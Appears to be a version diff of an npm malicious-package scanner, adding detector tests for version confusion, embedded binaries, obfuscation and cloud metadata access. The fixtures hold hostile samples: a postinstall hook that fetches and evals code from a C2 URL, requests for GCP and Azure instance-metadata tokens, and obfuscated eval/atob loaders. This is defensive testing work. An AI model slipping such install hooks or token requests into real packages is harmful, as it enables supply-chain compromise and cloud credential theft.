@lateos/npm-scan 0.18.3 → 1.1.0

package/backend/siem/index.js

@@ -16,4 +16,4 @@ export function generateSIEM(scans, format = 'cef') {
     default:
       throw new Error(`Unknown SIEM format: ${format}. Supported: cef, ecs, sentinel, qradar`);
   }
-}
+}

package/backend/siem/qradar.js

@@ -1,7 +1,7 @@
 export function generateQRadar(scans) {
   const events = [];
   for (const s of scans) {
-    for (const f of (s.findings || [])) {
+    for (const f of s.findings || []) {
       const atkId = f.atk_id || f.id;
       events.push({
         source: 'npm-scan',
@@ -32,7 +32,7 @@ export function generateQRadar(scans) {
       });
     }
   }
-  return events.map(e => JSON.stringify(e)).join('\n');
+  return events.map((e) => JSON.stringify(e)).join('\n');
 }
 
 const QID_MAP = {
@@ -54,4 +54,4 @@ function _qrCategory(severity) {
     low: 'Low Severity Malware',
   };
   return map[severity] || 'Medium Severity Malware';
-}
+}

package/backend/siem/sentinel.js

@@ -1,7 +1,7 @@
 export function generateSentinel(scans) {
   const events = [];
   for (const s of scans) {
-    for (const f of (s.findings || [])) {
+    for (const f of s.findings || []) {
       const atkId = f.atk_id || f.id;
       events.push({
         TimeGenerated: new Date().toISOString(),
@@ -25,4 +25,4 @@ export function generateSentinel(scans) {
     }
   }
   return JSON.stringify(events, null, 2);
-}
+}

package/backend/tests-d5-enhanced.test.js

@@ -0,0 +1,47 @@
+import { test, describe } from 'node:test';
+import assert from 'assert/strict';
+import * as detectors from './detectors/index.js';
+
+describe('D5: Binary Embed Enhancement', () => {
+  test('D5: flags cross-platform campaign-1 binary set with high confidence', async () => {
+    const allFiles = [
+      { path: 'bin/agent-linux-x64', content: String.fromCharCode(0x7f) + 'ELF' },
+      { path: 'bin/agent-macos-arm64', content: String.fromCharCode(0xcf, 0xfa, 0xed, 0xfe) },
+      { path: 'bin/agent-windows-x86.exe', content: String.fromCharCode(0x4d, 0x5a) },
+    ];
+    const pkg = { name: 'suspicious-pkg', version: '1.0.0' };
+    const findings = await detectors.runAll(pkg, [], null, allFiles);
+    const matches = findings.filter((f) => f.id === 'TIER1-BINARY-EMBED');
+    assert(matches.length > 0, 'Expected TIER1-BINARY-EMBED finding');
+    const hasCrossPlatform = matches.some((m) =>
+      m.evidence.some((e) => e.includes('cross-platform'))
+    );
+    assert(hasCrossPlatform, 'Expected cross-platform binary set evidence');
+  });
+
+  test('D5: cross-platform binary set scores > 85', async () => {
+    const allFiles = [
+      { path: 'bin/agent-linux-x64', content: String.fromCharCode(0x7f) + 'ELF' },
+      { path: 'bin/agent-macos-arm64', content: String.fromCharCode(0xcf, 0xfa, 0xed, 0xfe) },
+    ];
+    const pkg = { name: 'suspicious-pkg', version: '1.0.0' };
+    const findings = await detectors.runAll(pkg, [], null, allFiles);
+    const matches = findings.filter((f) => f.id === 'TIER1-BINARY-EMBED');
+    const hasHighScore = matches.some((m) => m.confidenceScore > 85);
+    assert(
+      hasHighScore,
+      `No finding with confidenceScore > 85; scores: ${matches.map((m) => m.confidenceScore).join(', ')}`
+    );
+  });
+
+  test('D5: single binary not flagged as cross-platform', async () => {
+    const allFiles = [{ path: 'bin/agent-linux-x64', content: String.fromCharCode(0x7f) + 'ELF' }];
+    const pkg = { name: 'normal-pkg', version: '1.0.0' };
+    const findings = await detectors.runAll(pkg, [], null, allFiles);
+    const matches = findings.filter((f) => f.id === 'TIER1-BINARY-EMBED');
+    const hasPlatformLabel = matches.some((m) =>
+      m.evidence.some((e) => e.includes('cross-platform'))
+    );
+    assert(!hasPlatformLabel, 'Single binary should not be flagged as cross-platform');
+  });
+});

package/backend/tests-d6-version-anomaly.test.js

@@ -0,0 +1,67 @@
+import { test, describe } from 'node:test';
+import assert from 'assert/strict';
+import * as detectors from './detectors/index.js';
+
+describe('D6: Version Anomaly', () => {
+  test('D6: flags 99.99.99 when legitimate max is 5.3.2', async () => {
+    const pkg = { name: '@widget/core', version: '99.99.99' };
+    const registryMeta = ['1.0.0', '1.5.0', '2.0.0', '2.1.0', '3.0.0', '4.0.0', '5.0.0', '5.3.2'];
+    const findings = await detectors.runAll(pkg, [], registryMeta);
+    const match = findings.find((f) => f.id === 'TIER1-VERSION-ANOMALY');
+    assert(match, 'Expected TIER1-VERSION-ANOMALY finding');
+    assert(match.confidenceScore > 90, `confidenceScore ${match.confidenceScore} <= 90`);
+  });
+
+  test('D6: flags 11.11.11 with high confidence', async () => {
+    const pkg = { name: 'internal-utils', version: '11.11.11' };
+    const registryMeta = ['1.0.0', '1.0.1', '1.1.0', '1.2.0', '2.0.0'];
+    const findings = await detectors.runAll(pkg, [], registryMeta);
+    const match = findings.find((f) => f.id === 'TIER1-VERSION-ANOMALY');
+    assert(match, 'Expected TIER1-VERSION-ANOMALY finding');
+    assert(match.confidenceScore > 85, `confidenceScore ${match.confidenceScore} <= 85`);
+  });
+
+  test('D6: does NOT flag legitimate 2.0.0 jump from 1.9.9', async () => {
+    const pkg = { name: 'stable-lib', version: '2.0.0' };
+    const registryMeta = [
+      '1.0.0',
+      '1.1.0',
+      '1.2.0',
+      '1.3.0',
+      '1.4.0',
+      '1.5.0',
+      '1.6.0',
+      '1.7.0',
+      '1.8.0',
+      '1.9.0',
+      '1.9.9',
+    ];
+    const findings = await detectors.runAll(pkg, [], registryMeta);
+    const match = findings.find((f) => f.id === 'TIER1-VERSION-ANOMALY');
+    assert(!match, 'Should not flag legitimate 2.0.0 major bump');
+  });
+
+  test('D6: handles null registry gracefully — degrades confidence', async () => {
+    const pkg = { name: 'offline-pkg', version: '99.99.99' };
+    const findings = await detectors.runAll(pkg);
+    const match = findings.find((f) => f.id === 'TIER1-VERSION-ANOMALY');
+    assert(match, 'Expected TIER1-VERSION-ANOMALY finding');
+    assert(match.confidenceScore < 70, `confidenceScore ${match.confidenceScore} >= 70`);
+  });
+
+  test('D6: no finding on KNOWN_REPUTABLE_PACKAGES regardless of version', async () => {
+    const pkg = { name: 'react', version: '99.99.99' };
+    const registryMeta = ['1.0.0', '2.0.0'];
+    const findings = await detectors.runAll(pkg, [], registryMeta);
+    const match = findings.find((f) => f.id === 'TIER1-VERSION-ANOMALY');
+    assert(!match);
+  });
+
+  test('D6: no finding on normal semver within range', async () => {
+    const pkg = { name: 'widget-core', version: '5.4.1' };
+    const registryMeta = ['1.0.0', '2.0.0', '3.0.0', '4.0.0', '5.0.0', '5.4.0'];
+    const findings = await detectors.runAll(pkg, [], registryMeta);
+    const match = findings.find((f) => f.id === 'TIER1-VERSION-ANOMALY');
+    assert(!match);
+  });
+});

package/backend/tests-d6.test.js

@@ -0,0 +1,126 @@
+import { test, describe } from 'node:test';
+import assert from 'assert/strict';
+import * as detectors from './detectors/index.js';
+
+// ─── D6a — tier1-version-confusion ──────────────────────────────────
+
+describe('D6a — tier1-version-confusion', () => {
+  test('D6a: detects exact sentinel version 99.99.99', async () => {
+    const pkg = { name: 'internal-utils', version: '99.99.99' };
+    const findings = await detectors.runAll(pkg);
+    const match = findings.find((f) => f.id === 'TIER1-VERSION-CONFUSION');
+    assert(match, 'Expected TIER1-VERSION-CONFUSION finding');
+    assert.equal(match.confidence, 'HIGH');
+    assert(match.confidenceScore >= 80, `confidenceScore ${match.confidenceScore} < 80`);
+  });
+
+  test('D6a: detects sentinel family versions 9.9.9 / 10.10.10 / 11.11.11', async () => {
+    for (const version of ['9.9.9', '10.10.10', '11.11.11']) {
+      const pkg = { name: 'corp-auth', version };
+      const findings = await detectors.runAll(pkg);
+      const match = findings.find((f) => f.id === 'TIER1-VERSION-CONFUSION');
+      assert(match, `Expected finding for version ${version}`);
+      assert(
+        match.confidenceScore >= 60,
+        `confidenceScore ${match.confidenceScore} < 60 for version ${version}`
+      );
+    }
+  });
+
+  test('D6a: no finding on legitimate semver', async () => {
+    const pkg = { name: 'lodash', version: '4.17.21' };
+    const findings = await detectors.runAll(pkg);
+    const match = findings.find((f) => f.id === 'TIER1-VERSION-CONFUSION');
+    assert(!match);
+  });
+
+  test('D6a: no finding on KNOWN_REPUTABLE_PACKAGES regardless of version', async () => {
+    const pkg = { name: 'react', version: '99.99.99' };
+    const findings = await detectors.runAll(pkg);
+    const match = findings.find((f) => f.id === 'TIER1-VERSION-CONFUSION');
+    assert(!match);
+  });
+});
+
+// ─── D6b — tier1-multistage-postinstall ──────────────────────────────
+
+describe('D6b — tier1-multistage-postinstall', () => {
+  test('D6b: detects two-stage download + binary execution in postinstall', async () => {
+    const pkg = {
+      name: 'malicious-pkg',
+      version: '1.0.0',
+      scripts: {
+        postinstall:
+          'node -e "fetch(process.env.C2_URL).then(r=>r.text()).then(eval)" && execFile("./payload")',
+      },
+    };
+    const findings = await detectors.runAll(pkg);
+    const match = findings.find((f) => f.id === 'TIER1-MULTISTAGE-POSTINSTALL');
+    assert(match, 'Expected TIER1-MULTISTAGE-POSTINSTALL finding');
+    assert.equal(match.confidence, 'HIGH');
+    assert(match.confidenceScore >= 80, `confidenceScore ${match.confidenceScore} < 80`);
+  });
+
+  test('D6b: detects detached background process spawn', async () => {
+    const pkg = {
+      name: 'persist-pkg',
+      version: '1.0.0',
+      scripts: {
+        postinstall: 'spawn("node", ["server.js"], { detached: true })',
+      },
+    };
+    const findings = await detectors.runAll(pkg);
+    const match = findings.find((f) => f.id === 'TIER1-MULTISTAGE-POSTINSTALL');
+    assert(match, 'Expected TIER1-MULTISTAGE-POSTINSTALL finding');
+    assert(match.confidenceScore >= 75, `confidenceScore ${match.confidenceScore} < 75`);
+  });
+
+  test('D6b: no finding on clean build script', async () => {
+    const pkg = {
+      name: 'clean-pkg',
+      version: '1.0.0',
+      scripts: {
+        postinstall: 'node build.js',
+      },
+    };
+    const findings = await detectors.runAll(pkg);
+    const match = findings.find((f) => f.id === 'TIER1-MULTISTAGE-POSTINSTALL');
+    assert(!match);
+  });
+
+  test('D6b: no duplicate finding when D3 already fires on same hook', async () => {
+    const pkg = {
+      name: 'dual-pkg',
+      version: '1.0.0',
+      scripts: {
+        postinstall:
+          'node -e "fetch(process.env.C2_URL).then(r=>r.text()).then(eval)" && execFile("./payload")',
+      },
+    };
+    const findings = await detectors.runAll(pkg);
+    const d6bMatches = findings.filter((f) => f.id === 'TIER1-MULTISTAGE-POSTINSTALL');
+    assert(d6bMatches.length > 0, 'Expected at least one TIER1-MULTISTAGE-POSTINSTALL finding');
+    assert.equal(d6bMatches[0].id, 'TIER1-MULTISTAGE-POSTINSTALL');
+    assert(d6bMatches[0].id !== 'ATK-003');
+  });
+});
+
+// ─── D2 Miasma Signature ────────────────────────────────────────────
+
+describe('D2 — named signature', () => {
+  test('D2 Miasma signature: detects "Miasma: The Spreading Blight" → CRITICAL', async () => {
+    const pkg = { name: 'test-pkg', version: '1.0.0' };
+    const jsFiles = [
+      { path: 'evil.js', content: 'const id = "Miasma: The Spreading Blight"; doEvil();' },
+    ];
+    const findings = await detectors.runAll(pkg, jsFiles, {}, []);
+    const match = findings.find((f) => f.id === 'TIER1-INFOSTEALER');
+    assert(match, 'Expected TIER1-INFOSTEALER finding from Miasma signature');
+    assert.equal(match.confidence, 'CRITICAL');
+    assert.equal(match.confidenceScore, 98);
+    assert(
+      match.evidence.some((e) => e.includes('Miasma: The Spreading Blight')),
+      'evidence should contain the signature string'
+    );
+  });
+});

package/backend/tests-d6c.test.js

@@ -0,0 +1,119 @@
+import { test, describe } from 'node:test';
+import assert from 'assert/strict';
+import * as detectors from './detectors/index.js';
+
+// ─── D6a — tier1-version-confusion ──────────────────────────────────
+
+describe('D6a — tier1-version-confusion', () => {
+  test('D6a: exact sentinel 99.99.99 → HIGH, confidenceScore >= 80', async () => {
+    const pkg = { name: 'internal-utils', version: '99.99.99' };
+    const findings = await detectors.runAll(pkg);
+    const match = findings.find((f) => f.id === 'TIER1-VERSION-CONFUSION');
+    assert(match, 'Expected TIER1-VERSION-CONFUSION finding');
+    assert.equal(match.confidence, 'HIGH');
+    assert(match.confidenceScore >= 80, `confidenceScore ${match.confidenceScore} < 80`);
+  });
+
+  test('D6a: exact sentinel 9.9.9 → MEDIUM, confidenceScore >= 60', async () => {
+    const pkg = { name: 'corp-auth', version: '9.9.9' };
+    const findings = await detectors.runAll(pkg);
+    const match = findings.find((f) => f.id === 'TIER1-VERSION-CONFUSION');
+    assert(match, 'Expected TIER1-VERSION-CONFUSION finding');
+    assert.equal(match.confidence, 'MEDIUM');
+    assert(match.confidenceScore >= 60, `confidenceScore ${match.confidenceScore} < 60`);
+  });
+
+  test('D6a: high-version heuristic 99.5.8 → MEDIUM, confidenceScore >= 60', async () => {
+    const pkg = { name: 'internal-payments', version: '99.5.8' };
+    const findings = await detectors.runAll(pkg);
+    const match = findings.find((f) => f.id === 'TIER1-VERSION-CONFUSION');
+    assert(match, 'Expected TIER1-VERSION-CONFUSION finding');
+    assert.equal(match.confidence, 'MEDIUM');
+    assert(match.confidenceScore >= 60, `confidenceScore ${match.confidenceScore} < 60`);
+  });
+
+  test('D6a: heuristic does not fire on legitimate high patch, e.g. 1.99.0', async () => {
+    const pkg = { name: 'some-lib', version: '1.99.0' };
+    const findings = await detectors.runAll(pkg);
+    const match = findings.find((f) => f.id === 'TIER1-VERSION-CONFUSION');
+    assert(!match);
+  });
+
+  test('D6a: no finding on legitimate semver 4.17.21', async () => {
+    const pkg = { name: 'lodash', version: '4.17.21' };
+    const findings = await detectors.runAll(pkg);
+    const match = findings.find((f) => f.id === 'TIER1-VERSION-CONFUSION');
+    assert(!match);
+  });
+
+  test('D6a: no finding on KNOWN_REPUTABLE_PACKAGES regardless of version', async () => {
+    const pkg = { name: 'react', version: '99.99.99' };
+    const findings = await detectors.runAll(pkg);
+    const match = findings.find((f) => f.id === 'TIER1-VERSION-CONFUSION');
+    assert(!match);
+  });
+});
+
+// ─── D6c — tier1-cloud-imds ─────────────────────────────────────────
+
+describe('D6c — tier1-cloud-imds', () => {
+  test('D6c: detects GCP metadata endpoint in JS file', async () => {
+    const jsFiles = [
+      {
+        path: 'index.js',
+        content:
+          'fetch("http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token")',
+      },
+    ];
+    const findings = await detectors.runAll({ name: 'test-pkg' }, jsFiles);
+    const match = findings.find((f) => f.id === 'TIER1-CLOUD-IMDS');
+    assert(match, 'Expected TIER1-CLOUD-IMDS finding');
+    assert.equal(match.confidence, 'HIGH');
+    assert(match.confidenceScore >= 80, `confidenceScore ${match.confidenceScore} < 80`);
+  });
+
+  test('D6c: detects Azure IMDS endpoint in JS file', async () => {
+    const jsFiles = [
+      {
+        path: 'app.js',
+        content:
+          'axios.get("http://169.254.169.254/metadata/instance", { headers: { Metadata: "true" } })',
+      },
+    ];
+    const findings = await detectors.runAll({ name: 'test-pkg' }, jsFiles);
+    const match = findings.find((f) => f.id === 'TIER1-CLOUD-IMDS');
+    assert(match, 'Expected TIER1-CLOUD-IMDS finding');
+    assert.equal(match.confidence, 'HIGH');
+    assert(match.confidenceScore >= 80, `confidenceScore ${match.confidenceScore} < 80`);
+  });
+
+  test('D6c: detects GCP/Azure pattern in postinstall script', async () => {
+    const pkg = {
+      name: 'malicious-pkg',
+      version: '1.0.0',
+      scripts: {
+        postinstall:
+          'node -e "require(\\"http\\").get(\\"http://metadata.google.internal/computeMetadata/v1/\\")"',
+      },
+    };
+    const findings = await detectors.runAll(pkg);
+    const match = findings.find((f) => f.id === 'TIER1-CLOUD-IMDS');
+    assert(match, 'Expected TIER1-CLOUD-IMDS finding');
+    assert.equal(match.confidence, 'HIGH');
+    assert(match.confidenceScore >= 80, `confidenceScore ${match.confidenceScore} < 80`);
+  });
+
+  test('D6c: no finding on clean JS with no IMDS patterns', async () => {
+    const jsFiles = [{ path: 'clean.js', content: 'const x = 1 + 1;' }];
+    const findings = await detectors.runAll({ name: 'test-pkg' }, jsFiles);
+    const match = findings.find((f) => f.id === 'TIER1-CLOUD-IMDS');
+    assert(!match);
+  });
+
+  test('D6c: no finding when 169.254.169.254 appears without /metadata path', async () => {
+    const jsFiles = [{ path: 'docs.js', content: '// link-local range starts at 169.254.0.0' }];
+    const findings = await detectors.runAll({ name: 'test-pkg' }, jsFiles);
+    const match = findings.find((f) => f.id === 'TIER1-CLOUD-IMDS');
+    assert(!match);
+  });
+});

package/backend/tests-d7-obfuscation.test.js

@@ -0,0 +1,88 @@
+import { test, describe } from 'node:test';
+import assert from 'assert/strict';
+import * as detectors from './detectors/index.js';
+
+describe('D7: Obfuscation Heuristics', () => {
+  test('D7: flags heavily obfuscated postinstall script', async () => {
+    const obfuscated = `var _0x=["eval","fromCharCode","charCodeAt"];for(var i=0;i<999;i++){var x=String.fromCharCode(i);if(i>500){eval(atob("Y29uc3QgeCA9ICdtYWxpY2lvdXMnO2V2YWwoeCk7Y29uc3QgeSA9ICdiYWNrZG9vcic7ZXZhbCh5KTs="))}}var _0xe="\\x65\\x76\\x61\\x6c\\x28\\x61\\x74\\x6f\\x62\\x28\\x22\\x59\\x6d\\x39\\x75\\x62\\x47\\x38\\x67"`;
+    const pkg = {
+      name: 'malicious-pkg',
+      version: '1.0.0',
+      scripts: { postinstall: obfuscated },
+    };
+    const findings = await detectors.runAll(pkg);
+    const match = findings.find((f) => f.id === 'TIER1-OBFUSCATION-HEURISTICS');
+    assert(match, 'Expected TIER1-OBFUSCATION-HEURISTICS finding');
+    assert(match.confidenceScore >= 75, `confidenceScore ${match.confidenceScore} < 75`);
+  });
+
+  test('D7: detects XOR cipher pattern in preinstall script', async () => {
+    const xorCode = `var _0xk=[0x66,0x6c,0x61,0x67];var _0xd="LzdHJKdUp4VWt5S292RXBsb3Zlck5pZ2h0U2VjcmV0S2V5Rm9yRW50cm9weUJvb3N0";let r='';for(let i=0;i<str.length;i++){r+=String.fromCharCode(str.charCodeAt(i)^_0xk[i%4]);if(i>50){eval(atob("RGV0ZWN0ZWQ="))}}`;
+    const pkg = {
+      name: 'suspicious-pkg',
+      version: '1.0.0',
+      scripts: { preinstall: xorCode },
+    };
+    const findings = await detectors.runAll(pkg);
+    const match = findings.find((f) => f.id === 'TIER1-OBFUSCATION-HEURISTICS');
+    assert(match, 'Expected TIER1-OBFUSCATION-HEURISTICS finding');
+    assert(match.confidenceScore >= 70, `confidenceScore ${match.confidenceScore} < 70`);
+  });
+
+  test('D7: does NOT flag normal string reversal (palindrome check)', async () => {
+    const normalCode = `
+      function isPalindrome(s) {
+        return s === s.split('').reverse().join('');
+      }
+    `;
+    const pkg = {
+      name: 'normal-pkg',
+      version: '1.0.0',
+      scripts: { postinstall: normalCode },
+    };
+    const findings = await detectors.runAll(pkg);
+    const match = findings.find((f) => f.id === 'TIER1-OBFUSCATION-HEURISTICS');
+    assert(!match, 'Should not flag normal palindrome function');
+  });
+
+  test('D7: flags high entropy in postinstall script', async () => {
+    const highEntropyCode = `var x="T3NobmFJc0VudHJvcHlCb29zdGVkV2l0aEJhc2U2NFBheWxvYWRUaGF0U2hvdWxkQmVQbGVudHlPZkNoYXJhY3RlcnNGb3JIaWdoRW50cm9weVNjb3JlQW5kSXRTaG91bGRCZU9mVmVyeUhpZ2hRdWFsaXR5VG9NYWtlVGhlVGVzdFBhc3NBbmRJdFNob3VsZEJlT2ZNaXhlZENhc2VXaXRoTnVtYmVyc0FuZFNwZWNpYWxDaGFyYWN0ZXJzRm9yTWF4RW50cm9weQ==";`;
+    const pkg = {
+      name: 'high-entropy-pkg',
+      version: '1.0.0',
+      scripts: { postinstall: highEntropyCode },
+    };
+    const findings = await detectors.runAll(pkg);
+    const match = findings.find((f) => f.id === 'TIER1-OBFUSCATION-HEURISTICS');
+    assert(match, 'Expected TIER1-OBFUSCATION-HEURISTICS finding');
+    assert(match.confidenceScore >= 55, `confidenceScore ${match.confidenceScore} < 55`);
+  });
+
+  test('D7: no finding on clean build script', async () => {
+    const cleanCode = `
+      const path = require('path');
+      const fs = require('fs');
+      fs.mkdirSync(path.join(__dirname, 'dist'));
+      console.log('build complete');
+    `;
+    const pkg = {
+      name: 'clean-pkg',
+      version: '1.0.0',
+      scripts: { postinstall: cleanCode },
+    };
+    const findings = await detectors.runAll(pkg);
+    const match = findings.find((f) => f.id === 'TIER1-OBFUSCATION-HEURISTICS');
+    assert(!match, 'Should not flag clean build script');
+  });
+
+  test('D7: no finding on KNOWN_REPUTABLE_PACKAGES', async () => {
+    const pkg = {
+      name: 'lodash',
+      version: '4.17.21',
+      scripts: { postinstall: 'eval(atob("dmFyIHg9J21hbGljaW91cyc7"))' },
+    };
+    const findings = await detectors.runAll(pkg);
+    const match = findings.find((f) => f.id === 'TIER1-OBFUSCATION-HEURISTICS');
+    assert(!match);
+  });
+});